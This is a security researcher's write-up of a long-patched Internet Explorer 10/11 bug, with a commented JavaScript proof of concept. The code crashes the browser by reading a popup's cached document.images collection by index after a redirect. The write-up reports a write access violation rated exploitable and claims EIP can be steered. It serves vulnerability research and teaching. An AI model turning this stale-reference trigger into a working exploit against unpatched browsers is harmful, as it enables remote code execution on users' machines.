Accessing a cached element collection (here `document.images`) by numeric index after the document that owned it has been navigated away (via a redirect) crashes Internet Explorer, and the WinDbg triage (presumably the `!exploitable` extension) rates the crash EXPLOITABLE. The author reports that EIP can be steered by varying the number of elements added before the redirect — behaviour consistent with a stale (dangling) reference to a collection of the discarded document. This is a variation of the named-element access bug, but using index-based access (`_images[0]`) instead of named properties. Note that an EXPLOITABLE rating is a heuristic triage result, not a demonstration of a working exploit.
// Holds a reference to the popup's `document.images` collection so that it outlives
// the popup's navigation; this stale reference is what the crash depends on.
var _images;
/**
 * Sets up the crash: opens a popup on a page that redirects, injects two <img>
 * elements into the not-yet-loaded popup document, caches its `document.images`
 * collection, and schedules an access to that cached collection for after the
 * redirect has (presumably) torn the original document down.
 *
 * NOTE(review): the statement order and the string-form timers are left exactly
 * as in the original PoC, since the reproduction depends on this sequence.
 */
function main() {
  // Popup on the redirecting page; its initial document is what we inject into below.
  var win = window.open("redirect.aspx", "", "width=400,height=400");
  // No delay given, so this fires on the popup's next tick; string-form setTimeout is
  // evaluated in the popup's own global scope (hence the popup's alert()).
  win.setTimeout('alert("Please, do not close this alert. The browser will crash in a couple of seconds...");');
  // Give the popup document a body and two images before the redirect happens.
  win.document.appendChild(win.document.createElement("body"));
  win.document.body.innerHTML = '<img src=1 /><img src=2 />';
  _images = win.document.images; // Save a reference to the images collection (kept across the redirect).
  // 2s is assumed to be enough for redirect.aspx to navigate the popup away; then touch the cache.
  setTimeout("accessCachedImagesByIndex()", 2000);
}
/**
 * Touches the cached `document.images` collection after the popup has navigated.
 * The PoC relies on the first (string-conversion) access throwing on the stale
 * collection; the index-based access in the catch block is the actual crash trigger.
 * Reads the file-level `_images` set by main().
 */
function accessCachedImagesByIndex() {
  try {
    // Expected to throw once the owning document is gone (see L1 of the write-up).
    alert(_images);
  } catch(e) {
    // Index-based access on the same stale collection is what produces the write AV.
    alert(_images[0]); // Crash!
  }
}
In a WinDbg session on IE10 / Windows 8 the crash surfaced as a write access violation in IEFRAME!CIECredentialManagerProxyImpl, with the corruption extending into a vtable pointer — which is what makes the EIP-control claim plausible and why the triage rates a user-mode write AV of this shape EXPLOITABLE. For a stale-reference bug the frame in which the fault surfaces is likely incidental (it names where the reused memory was touched, not the bug's origin), so the symbol may vary between runs. Tested on IE10 and on IE11 build 20130312-2100 (a pre-release build, judging by the date).
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.